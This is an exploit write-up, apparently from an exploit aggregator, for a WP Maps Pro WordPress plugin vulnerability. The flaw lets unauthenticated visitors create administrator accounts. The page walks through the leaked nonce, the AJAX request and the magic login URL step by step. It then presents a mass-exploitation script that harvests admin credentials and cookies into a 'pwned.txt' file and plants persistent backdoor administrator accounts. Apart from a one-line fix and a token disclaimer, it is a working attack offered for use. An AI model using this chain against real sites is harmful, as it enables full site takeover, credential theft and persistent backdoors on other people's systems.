Share
## https://sploitus.com/exploit?id=9A2F776F-62A6-58BF-BE46-69B82EED9DCC
CVE-2026-8732 โ WP Maps Pro โค 6.1.0
โก Unauthenticated Privilege Escalation via Administrator Account Creation โก
=== shadow โก & friska ===
---
## ๐ Vulnerability Info
| Field | Details |
|-------|---------|
| **CVE ID** | CVE-2026-8732 |
| **CVSS Score** | 9.8 (Critical) |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Type** | Missing Authentication for Critical Function |
| **Plugin** | WP Maps Pro (`wp-google-map-gold`) |
| **Affected** | All versions โค 6.1.0 |
| **Patched** | 6.1.1 |
| **Published** | May 28, 2026 |
| **Researcher** | [David Brown](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/david-brown) |
| **PoC** | Shadow & Friska ๐ |
---
## ๐ Description
The **WP Maps Pro** plugin for WordPress is vulnerable to **Unauthenticated Privilege Escalation via Administrator Account Creation**.
The `wpgmp_temp_access_ajax` AJAX action is registered with `wp_ajax_nopriv_` and protected only by a nonce check using the `fc-call-nonce` nonce โ which is **publicly embedded into every frontend page** via `wp_localize_script` as the `nonce` field of the `wpgmp_local` JavaScript object.
This renders the nonce check **completely ineffective** as an access control mechanism, allowing unauthenticated attackers to:
1. Extract the nonce from any public page
2. Invoke the `wpgmp_temp_access_support` handler with `check_temp=false`
3. Trigger unconditional creation of a new WordPress **Administrator** account
4. Receive a magic login URL that calls `wp_set_auth_cookie()` โ granting full admin access
5. Create a persistent backdoor account
> **Result:** Complete site takeover with zero prior authentication.
---
## ๐งฌ Root Cause Analysis
### 1. Hook Registered Inside `is_admin()` Block โ But `is_admin()` is Always True for AJAX
```php
// wp-google-map-gold.php
if ( is_admin() ) { // โ is_admin() = TRUE for all admin-ajax.php requests!
add_action( 'wp_ajax_wpgmp_temp_access_ajax', [ $this, 'wpgmp_temp_access_ajax_callback'] );
add_action( 'wp_ajax_nopriv_wpgmp_temp_access_ajax', [ $this, 'wpgmp_temp_access_ajax_callback'] ); // โ nopriv = unauthenticated!
}
```
### 2. Nonce Exposed to Every Frontend Page
```php
// classes/wpgmp-helper.php
$wpgmp_local = [
'urlforajax' => admin_url( 'admin-ajax.php' ),
'nonce' => wp_create_nonce( 'fc-call-nonce' ), // โ LEAKED to public HTML!
// ...
];
wp_localize_script( 'wpgmp-google-map-main', 'wpgmp_local', $wpgmp_local );
```
Any visitor can read the nonce from page source. WordPress nonces are CSRF tokens โ not authentication tokens.
### 3. No Capability Check in AJAX Callback
```php
function wpgmp_temp_access_ajax_callback(){
check_ajax_referer( 'fc-call-nonce', 'nonce' ); // โ bypassed via public nonce
// NO current_user_can() check!
$temp_access = new WPGMP_Temp_Access();
$response = $temp_access->wpgmp_temp_access_support();
wp_send_json($response);
}
```
### 4. Unconditional Admin Account Creation
```php
// classes/wpgmp-temp-access.php
if (isset($_POST['check_temp']) && $_POST['check_temp'] == 'false') {
$username = 'fc_user_' . uniqid(); // random username
$email = 'support@flippercode.com'; // hardcoded email
$role = 'administrator'; // hardcoded role โ ROOT CAUSE
$result = self::fc_create_new_user($username, $email, $role);
if (is_numeric($result)) {
$access_link = self::generate_login_link($result);
$response['url'] = $access_link; // โ magic URL returned to attacker!
}
}
```
### 5. Magic Login via `init` Hook โ No Expiry, No Single-Use
```php
// Hooked to init โ runs on EVERY request, no auth required
function wpgmp_access_token_check(){
if ( ! empty( $_GET['wpgmp_token'] ) ) {
$temp_access->get_valid_user_based_on_wpgmp_token($wpgmp_access_token);
}
}
// Inside get_valid_user_based_on_wpgmp_token():
wp_set_current_user( $temporary_user_id, $temporary_user_login );
wp_set_auth_cookie( $temporary_user_id ); // โ SESSION SET AS ADMIN
wp_safe_redirect( admin_url() ); // โ REDIRECT TO DASHBOARD
```
---
## โ๏ธ Attack Chain
```
[Unauthenticated Attacker]
โ
โผ
GET /any-page/
โ HTML: wpgmp_local = {"nonce":"XXXXXXXX",...}
โ
โผ
POST /wp-admin/admin-ajax.php
action=wpgmp_temp_access_ajax
nonce=XXXXXXXX
check_temp=false
โ {"url":"https://target.com/wp-admin/?wpgmp_token="}
โ
โผ
GET /wp-admin/?wpgmp_token=
โ wp_set_auth_cookie() fired
โ 302 โ /wp-admin/
โ
โผ
[Full Administrator Access] ๐
โ
โผ
POST /wp-json/wp/v2/users
X-WP-Nonce:
{"username":"backdoor","password":"...","roles":["administrator"]}
โ
โผ
[Persistent Backdoor Created] ๐
```
---
## ๐ ๏ธ Tools
### `shadow.py` โ Full Exploit Chain
Single target or mass exploitation.
```bash
# Interactive
python3 shadow.py
# Single target
python3 shadow.py -u https://target.com
# Mass exploit
python3 shadow.py -f targets.txt -t 20
```
**Exploit Phases:**
```
Phase 1 โถ Plugin & Feature Detection
Phase 2 โถ Nonce Scan (parallel crawler)
Phase 3 โถ Admin Creation via AJAX
Phase 4 โถ Magic Login (wp_set_auth_cookie)
Phase 5 โถ Persistent Backdoor (REST API)
```
**Output (`pwned.txt`):**
```
1.
=======================================================
Target : https://target.com/wp-admin/
User : shadow_xxxxx
Pass : Xk9#mQ2pLrTv8nYw
Email : xxxxx@xxxx.com
Magic : https://target.com/wp-admin/?wpgmp_token=...
=======================================================
Cookies :
=======================================================
wordpress_logged_in_...=fc_user_...
=======================================================
```
---
## ๐ Mitigation
Update WP Maps Pro to version **6.1.1** or newer.
---
**[shadow โก friska]** โ for educational and authorized security research only